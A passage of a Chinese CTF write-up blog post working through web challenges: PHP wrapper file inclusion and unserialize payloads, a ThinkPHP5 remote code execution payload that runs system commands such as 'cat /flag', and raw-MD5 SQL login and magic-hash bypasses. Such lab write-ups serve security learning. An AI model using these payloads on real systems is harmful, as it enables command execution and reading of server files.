class="line">phar://  <span class="comment"> //说通俗点就是php解压缩包的一个函数，解压的压缩包与后缀无关  </span></span><br><span class="line">常用语句：phar://test.[zip/jpg/png…]/<span class="built_in">file</span>.txt</span><br><span class="line"></span><br><span class="line">data://<span class="keyword">text</span>/plain;base64,base编码字符串   <span class="comment"> //很常用的数据流构造器，将读取后面base编码字符串后解码的数据作为数据流的输入</span></span><br></pre></td></tr></table></figure></p>
<h2 id="测试过程-2"><a href="#测试过程-2" class="headerlink" title="测试过程"></a>测试过程</h2><p>这里有两种方法  一种是使用php://input，但是需要在POST请求下进行，比较繁琐，所以我这里采用了data协议</p>
<p>pyload:<br><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="keyword">text</span>=<span class="keyword">data</span>:<span class="comment">//text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=</span></span><br></pre></td></tr></table></figure></p>
<p>接着看到<br><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">"/flag/"</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        echo <span class="string">"Not now!"</span>;</span><br><span class="line">        <span class="keyword">exit</span>(); </span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        include(<span class="variable">$file</span>);  <span class="regexp">//u</span>seless.php</span><br><span class="line">        <span class="variable">$password</span> = unserialize(<span class="variable">$password</span>);</span><br><span class="line">        echo <span class="variable">$password</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure><br>看到了include  并且提示了useless.php 所以考虑使用文件包含，用PHP://filter来读取<br>pyload:<br><figure class="highlight maxima"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?text=data://text/plain;<span class="built_in">base64</span>,d2VsY29tZSB0byB0aGUgempjdGY=&amp;file=php://filter/<span class="built_in">read</span>=<span class="built_in">convert</span>.<span class="built_in">base64</span>-encode/resource=useless.php</span><br></pre></td></tr></table></figure></p>
<p>获得了useless.php的base64 解码后得到源码为<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span>  </span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="class"><span class="keyword">class</span> <span class="title">Flag</span></span>&#123;  <span class="comment">//flag.php  </span></span></span><br><span class="line"><span class="php">    <span class="keyword">public</span> $file;  </span></span><br><span class="line"><span class="php">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__tostring</span><span class="params">()</span></span>&#123;  </span></span><br><span class="line"><span class="php">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;file))&#123;  </span></span><br><span class="line"><span class="php">            <span class="keyword">echo</span> file_get_contents(<span class="keyword">$this</span>-&gt;file); </span></span><br><span class="line"><span class="php">            <span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span></span><br><span class="line"><span class="php">        <span class="keyword">return</span> (<span class="string">"U R SO CLOSE !///COME ON PLZ"</span>);</span></span><br><span class="line"><span class="php">        &#125;  </span></span><br><span class="line"><span class="php">    &#125;  </span></span><br><span class="line"><span class="php">&#125;  </span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure><br>接下来看到password变量需要进行反序列化的一个操作<br>所以我们这里反序列化这个Flag类：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Flag</span></span>&#123;  <span class="comment">//flag.php</span></span><br><span class="line">    <span class="keyword">public</span> $file=<span class="string">'flag.php'</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__tostring</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;file))&#123;</span><br><span class="line">            <span class="keyword">echo</span> file_get_contents(<span class="keyword">$this</span>-&gt;file);</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">            <span class="keyword">return</span> (<span class="string">"U R SO CLOSE !///COME ON PLZ"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$flag=<span class="keyword">new</span> Flag();</span><br><span class="line">$flag=serialize($flag);</span><br><span class="line"><span class="keyword">echo</span> $flag;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">输出结果为：</span><br><span class="line">O:<span class="number">4</span>:<span class="string">"Flag"</span>:<span class="number">1</span>:&#123;s:<span class="number">4</span>:<span class="string">"file"</span>;s:<span class="number">8</span>:<span class="string">"flag.php"</span>;&#125;</span><br></pre></td></tr></table></figure><br>pyload:<br><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="type">text</span>=data://<span class="type">text</span>/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&amp;file=useless.php&amp;<span class="keyword">password</span>=O:<span class="number">4</span>:"Flag":<span class="number">1</span>:&#123;s:<span class="number">4</span>:"file";s:<span class="number">8</span>:"flag.php";&#125;</span><br></pre></td></tr></table></figure><br>最后F12,得到flag</p>
<h1 id="BJDCTF-2nd-old-hack"><a href="#BJDCTF-2nd-old-hack" class="headerlink" title="[BJDCTF 2nd]old-hack"></a>[BJDCTF 2nd]old-hack</h1><h2 id="分析-2"><a href="#分析-2" class="headerlink" title="分析"></a>分析</h2><p>打开链接之后，并没有发现什么特别的，看到一个Powered By THINKPHP5</p>
<p>所以百度了一下THINKPHP5是什么东西</p>
<p>经过百度之后，查看到THINKPHP5是为了简化企业级应用开发和敏捷WEB应用开发而诞生的，得知这是一个建站的框架</p>
<p>再加搜索 看到这一篇文章<br><a href="https://www.codercto.com/a/54587.html" target="_blank" rel="noopener">https://www.codercto.com/a/54587.html</a></p>
<p>得知了考察的是任意代码执行漏洞</p>
<h2 id="知识点-2"><a href="#知识点-2" class="headerlink" title="知识点"></a>知识点</h2><p>这里的知识点就是文章中提到的THINKPHP5.X版本的RCE</p>
<p>原来RCE离我那么近</p>
<h2 id="测试过程-3"><a href="#测试过程-3" class="headerlink" title="测试过程"></a>测试过程</h2><p>使用文章中的pyload进行测试<br><img src="/images/Nepnep/[BJDCTF2nd]old-hack0.png" alt="avatar"></p>
<p>得到如图所示的界面，接下来pyload:<br><figure class="highlight oxygene"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_method=__construct&amp;filter[]=system&amp;<span class="function"><span class="keyword">method</span>=<span class="title">get</span>&amp;<span class="title">get</span>[]=<span class="title">ls</span> /</span></span><br></pre></td></tr></table></figure><br><img src="/images/Nepnep/[BJDCTF2nd]old-hack1.png" alt="avatar"></p>
<p>最后cat flag<br><figure class="highlight oxygene"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_method=__construct&amp;filter[]=system&amp;<span class="function"><span class="keyword">method</span>=<span class="title">get</span>&amp;<span class="title">get</span>[]=<span class="title">cat</span> /<span class="title">flag</span></span></span><br></pre></td></tr></table></figure></p>
<p>得到flag</p>
<h1 id="BJDCTF2020-Easy-MD5"><a href="#BJDCTF2020-Easy-MD5" class="headerlink" title="[BJDCTF2020]Easy MD5"></a>[BJDCTF2020]Easy MD5</h1><h2 id="分析-3"><a href="#分析-3" class="headerlink" title="分析"></a>分析</h2><p>打开之后是个查询窗口，F12也没有什么提示，所以使用BP抓包一下，得到了hint<br>Hint: select * from ‘admin’ where password=md5($pass,true)</p>
<p>查询了一下md5($pass,true)</p>
<p>参考了这些文章：<br><a href="https://blog.csdn.net/March97/article/details/81222922" target="_blank" rel="noopener">https://blog.csdn.net/March97/article/details/81222922</a><br><a href="https://www.jianshu.com/p/12125291f50d" target="_blank" rel="noopener">https://www.jianshu.com/p/12125291f50d</a><br><a href="https://www.cnblogs.com/tqing/p/11852990.html" target="_blank" rel="noopener">https://www.cnblogs.com/tqing/p/11852990.html</a></p>
<h2 id="知识点-3"><a href="#知识点-3" class="headerlink" title="知识点"></a>知识点</h2><p>1）经过md5加密后：276f722736c95d99e921722cf9ed621c</p>
<p>再转换为字符串：’or’6&lt;乱码&gt;  即  ‘or’66�]��!r,��b</p>
<p>2）在mysql里面，在用作布尔型判断时，以1开头的字符串会被当做整型数。要注意的是这种情况是必须要有单引号括起来的，比如password=‘xxx’ or ‘1xxxxxxxxx’，那么就相当于password=‘xxx’ or 1 ，也就相当于password=‘xxx’ or true，所以返回值就是true。当然在我后来测试中发现，不只是1开头，只要是数字开头都是可以的。<br>当然如果只有数字的话，就不需要单引号，比如password=‘xxx’ or 1，那么返回值也是true</p>
<p>3）ffifdyop，这个点的原理是 ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c，这个字符串前几位刚好是 ‘ or ‘6，<br>而 Mysql 刚好又会吧 hex 转成 ascii 解释，因此拼接之后的形式是1select * from ‘admin’ where password=’’ or ‘6xxxxx’</p>
<p>等价于 or 一个永真式，因此相当于万能密码，可以绕过md5()函数</p>
<h3 id="md5碰撞"><a href="#md5碰撞" class="headerlink" title="md5碰撞"></a>md5碰撞</h3><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">以下值在md5加密后以<span class="number">0</span>E开头：</span><br><span class="line"></span><br><span class="line">    QNKCDZO</span><br><span class="line">    <span class="number">240610708</span></span><br><span class="line">    s878926199a</span><br><span class="line">    s155964671a</span><br><span class="line">    s214587387a</span><br><span class="line">    s214587387a</span><br><span class="line"></span><br><span class="line">PHP在处理哈希字符串时，它把每一个以“<span class="number">0</span>E”开头的哈希值都解释为<span class="number">0</span>，所以如果两个不同的密码经过哈希以后，其哈希值都是以“<span class="number">0</span>E”开头的，那么PHP将会认为他们相同，都是<span class="number">0</span>。</span><br></pre></td></tr></table></figure>
<h3 id="与"><a href="#与" class="headerlink" title="===与!=="></a>===与!==</h3><p>===是包括变量值与类型完全相等，而==只是复比较两个数的值是否相等。<br>比如：100==“100” 这里用==，因为它们制的值相等，都是知100，结果为道真<br>但是若用===，因为左边是一个整型而右边则是一个字符串类型的数，类型不相同所以结果为假</p>
<h2 id="测试过程-4"><a href="#测试过程-4" class="headerlink" title="测试过程"></a>测试过程</h2><p>直接构造pylioad<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">leveldo4.php?<span class="attribute">password</span>=ffifdyop</span><br></pre></td></tr></table></figure></p>
<p>得到代码<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!--</span></span><br><span class="line"><span class="comment">$a = $GET['a'];</span></span><br><span class="line"><span class="comment">$b = $_GET['b'];</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">if($a != $b &amp;&amp; md5($a) == md5($b))&#123;</span></span><br><span class="line"><span class="comment">    // wow, glzjin wants a girl friend.</span></span><br><span class="line"><span class="comment">--&gt;</span></span><br></pre></td></tr></table></figure><br>分析源码发现是非常常规的md5碰撞或者可以采用数组</p>
<p>方法一:md5碰撞<br>pyload:<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">levels91.php?<span class="attribute">a</span>=QNKCDZO&amp;b=240610708</span><br></pre></td></tr></table></figure></p>
<p>得到源码<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">error_reporting(<span class="number">0</span>);</span></span><br><span class="line"><span class="php"><span class="keyword">include</span> <span class="string">"flag.php"</span>;</span></span><br><span class="line"></span><br><span class="line"><span class="php">highlight_file(<span class="keyword">__FILE__</span>);</span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="keyword">if</span>($_POST[<span class="string">'param1'</span>]!==$_POST[<span class="string">'param2'</span>]&amp;&amp;md5($_POST[<span class="string">'param1'</span>])===md5($_POST[<span class="string">'param2'</span>]))&#123;</span></span><br><span class="line"><span class="php">    <span class="keyword">echo</span> $flag;</span></span><br><span class="line"><span class="php">&#125;</span></span><br></pre></td></tr></table></figure></p>
<p>这里由于使用了===和!== 所以只好使用数组来进行绕过<br><img src="/images/Nepnep/[BJDCTF2nd]old-hack2.png" alt="avatar"></p>
<p>得到flag</p>
<p>方法二：数组<br>pyload:<br><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">levels91.php?a[]=<span class="number">1</span>&amp;b[]=<span class="number">2</span></span><br></pre></td></tr></table></figure></p>
<p>后面的步骤与方法一相同 这里不再细说</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
            <a href="/tags/Nepnep/" rel="tag"># Nepnep</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/05/02/Python3-2020-5-1-%E5%91%A8%E6%8A%A510/" rel="next" title="Python3-2020/5/1-周报10">
                <i class="fa fa-chevron-left"></i> Python3-2020/5/1-周报10
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/header.jpg"
                alt="51nd0re1" />
            
              <p class="site-author-name" itemprop="name">51nd0re1</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">43</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/rss2.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/diao-diao" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:302684932@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://l0x1c.github.io/" title="L0x1c" target="_blank">L0x1c</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://15h3na0.xyz/" title="15h3na0" target="_blank">15h3na0</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://p3rh4ps.top/" title="p3rh4ps" target="_blank">p3rh4ps</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/yesec/" title="yesec" target="_blank">yesec</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://ch4ser-go.github.io/" title="ch4ser" target="_blank">ch4ser</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.ggb0n.cool/" title="ggb0n" target="_blank">ggb0n</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://github.mrkaixin.computer/" title="mrkaixin" target="_blank">mrkaixin</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://imagin.vip/" title="imagin" target="_blank">imagin</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#ACTF2020-新生赛-Include"><span class="nav-number">1.</span> <span class="nav-text">[ACTF2020 新生赛]Include</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#测试过程"><span class="nav-number">1.1.</span> <span class="nav-text">测试过程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#BJDCTF-2nd-fake-google"><span class="nav-number">2.</span> <span class="nav-text">[BJDCTF 2nd]fake google</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#分析"><span class="nav-number">2.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#知识点"><span class="nav-number">2.2.</span> <span class="nav-text">知识点</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#jiajia2的基本语法"><span class="nav-number">2.2.1.</span> <span class="nav-text">jiajia2的基本语法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#测试过程-1"><span class="nav-number">2.3.</span> <span class="nav-text">测试过程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SSTI注入-POC收藏"><span class="nav-number">2.4.</span> <span class="nav-text">SSTI注入-POC收藏</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ZJCTF-2019-NiZhuanSiWei"><span class="nav-number">3.</span> <span class="nav-text">[ZJCTF 2019]NiZhuanSiWei</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#分析-1"><span class="nav-number">3.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#知识点-1"><span class="nav-number">3.2.</span> <span class="nav-text">知识点</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#PHP支持的伪协议"><span class="nav-number">3.2.1.</span> <span class="nav-text">PHP支持的伪协议</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#测试过程-2"><span class="nav-number">3.3.</span> <span class="nav-text">测试过程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#BJDCTF-2nd-old-hack"><span class="nav-number">4.</span> <span class="nav-text">[BJDCTF 2nd]old-hack</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#分析-2"><span class="nav-number">4.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#知识点-2"><span class="nav-number">4.2.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#测试过程-3"><span class="nav-number">4.3.</span> <span class="nav-text">测试过程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#BJDCTF2020-Easy-MD5"><span class="nav-number">5.</span> <span class="nav-text">[BJDCTF2020]Easy MD5</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#分析-3"><span class="nav-number">5.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#知识点-3"><span class="nav-number">5.2.</span> <span class="nav-text">知识点</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#md5碰撞"><span class="nav-number">5.2.1.</span> <span class="nav-text">md5碰撞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#与"><span class="nav-number">5.2.2.</span> <span class="nav-text">===与!==</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#测试过程-4"><span class="nav-number">5.3.</span> <span class="nav-text">测试过程</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">51nd0re1</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
